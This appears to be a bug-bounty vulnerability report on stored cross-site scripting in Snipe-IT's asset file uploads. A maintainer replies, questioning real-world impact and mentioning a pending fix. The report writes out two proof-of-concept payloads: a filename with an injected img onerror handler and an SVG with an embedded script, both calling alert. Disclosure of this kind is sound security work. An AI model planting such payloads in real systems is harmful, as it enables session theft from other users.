Cross-site Scripting (XSS) - Generic in snipe/snipe-it
Reported on
Oct 5th 2021
Description
At File Uploads allows for arbitrary execution of JavaScript
Step to Reproduct
XSS at filename
Goto detail of one asset
At tab File choose to upload file with filename contain payload: file'><img src=x onerror=alert(1)>name
XSS when upload file .svg (In list file types are allowed don't have file .svg)
Goto detail of one asset
At tab File choose to upload file svg with contain payload:
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<rect width="300" height="100" style="fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)" />
<script type="text/javascript">
alert("XSS");
</script>
</svg>
When uploaded, click to download
Impact
This vulnerability has the potential to steal a user's cookie and gain unauthorized access to that user's account through the stolen cookie.
Hi - thanks for this. I'm unclear on how this actually works IRL tho. We force a download for uploaded files, which means you'd have to download it. Which means any image editor it would nullify any javascript and any sessions attached to it.
If you can provide me with a little more detail on how you're seeing this work in the wild (screenshots would be great) we can take a look.
I have a PR up against master right now, it's just awaiting QA finals
